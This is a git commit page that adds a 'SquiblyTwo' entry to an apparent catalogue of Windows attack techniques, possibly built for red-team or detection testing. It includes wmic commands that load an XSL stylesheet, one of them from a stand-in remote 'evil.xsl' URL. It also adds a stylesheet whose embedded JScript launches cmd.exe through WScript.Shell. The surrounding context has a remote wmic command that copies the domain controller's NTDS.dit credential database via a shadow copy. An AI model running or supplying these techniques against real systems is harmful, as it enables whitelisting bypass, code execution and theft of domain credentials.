SquiblyTwo
Adding SquiblyTwo
This commit is contained in:
@@ -43,3 +43,13 @@ Input:
|
||||
Input:
|
||||
|
||||
wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
|
||||
|
||||
### SquiblyTwo
|
||||
|
||||
Input:
|
||||
|
||||
wmic process list /FORMAT:evil.xsl
|
||||
|
||||
Input:
|
||||
|
||||
wmic os get /FORMAT:”https:///evil.xsl”
|
||||
|
||||
@@ -0,0 +1,11 @@
|
||||
<?xml version='1.0'?>
|
||||
<stylesheet
|
||||
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
||||
xmlns:user="placeholder"
|
||||
version="1.0">
|
||||
<output method="text"/>
|
||||
<ms:script implements-prefix="user" language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
|
||||
]]> </ms:script>
|
||||
</stylesheet>
|
||||
Reference in New Issue
Block a user